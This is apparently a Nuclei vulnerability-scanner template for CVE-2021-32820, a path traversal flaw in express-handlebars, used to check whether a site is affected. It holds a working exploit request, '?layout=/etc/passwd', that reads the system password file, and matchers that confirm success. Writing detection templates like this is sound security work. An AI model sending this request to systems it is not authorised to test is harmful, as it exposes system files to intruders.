nuclei-templates/cves/2021/CVE-2021-32820.yaml

30 lines
693 B
YAML

id: CVE-2021-32820
info:
name: Express-handlebars Path Traversal
author: dhiyaneshDk
severity: medium
reference: |
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?layout=/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
- "daemon:[x*]:0:0:"
- "operator:[x*]:0:0:"
part: body
condition: or